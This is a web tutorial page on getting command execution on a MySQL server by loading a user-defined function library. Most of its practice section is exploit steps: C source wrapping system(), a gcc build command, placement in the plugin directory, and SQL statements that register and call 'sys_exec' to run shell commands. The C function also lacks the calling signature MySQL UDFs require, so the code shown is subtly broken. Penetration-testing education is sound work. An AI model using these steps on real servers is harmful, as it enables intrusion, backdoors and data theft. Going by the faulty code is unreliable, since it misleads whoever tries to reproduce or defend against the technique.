COMMAND - UDF Library

Context

This article explores the technique of executing commands on a MySQL server through the use of User Defined Functions (UDF) libraries. The objective is to understand how attackers can exploit this method to execute arbitrary commands if the server is not properly secured. This topic assumes knowledge of user-defined functions and general command execution techniques.

Theory

User Defined Functions (UDF) in MySQL

User Defined Functions (UDFs) are custom functions that developers can add to MySQL servers to extend their features beyond what is available natively. These functions are implemented in a shared library and then linked to the MySQL server. Typically, UDFs are used to perform complex calculations or extend functionality. However, if the MySQL server is not properly configured, UDFs can be leveraged to execute arbitrary system-level commands.

Vulnerability Model

The security risk lies in the ability to upload and execute custom UDFs. If the attacker gains access to upload files and creates a UDF that includes malicious code, they can execute commands on the server. This vulnerability arises particularly in environments where user access control and file permissions are not stringently managed.

Command Execution via UDF

To execute a command using a UDF, an attacker typically follows a sequence of steps:

  1. Upload a Malicious UDF Library: The attacker compiles a shared object library containing the malicious UDF and uploads it to a location accessible by the MySQL server.

  2. Invoke the UDF: Once the library is in place, the attacker can create a MySQL function linked to this library and invoke it to execute system commands.

Practice

Command Execution via UDF Library

This section explains how to execute commands on a MySQL server using a UDF library. It details the necessary steps to achieve command execution if the server's security controls are inadequate.

  • First, write a C program that implements the desired system execution function. Here is a simple example of the C code (udf.c):

    #include <stdlib.h>

int sys_exec(const char *command) {
    return system(command);
}

  • Compile this code into a shared object file that can be loaded by the MySQL server:

    gcc -shared -o libudf.so -fPIC udf.c

  • Copy or upload the compiled libudf.so file to a directory where MySQL can load it. Commonly, this would be a directory MySQL has write permissions to such as /usr/lib/mysql/plugin.

  • Connect to the MySQL server and create a new UDF using the uploaded shared object:

    mysql -u root -p -e "CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'libudf.so';"

  • You can now execute system commands via MySQL using the new UDF. For instance, to check the current user ID, you can execute:

    mysql -u root -p -e "SELECT sys_exec('id');"

Result

Executing the steps above will allow you to execute any system-level command on the MySQL server where the UDF was created. Through the UDF, attackers gain the ability to manipulate or extract data, create persistent backdoors, or further exploit the network.

Tools

  • gcc: A compiler to create shared object files from C source code.
  • mysql client: Command-line tool to connect to the MySQL server and execute SQL queries.

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.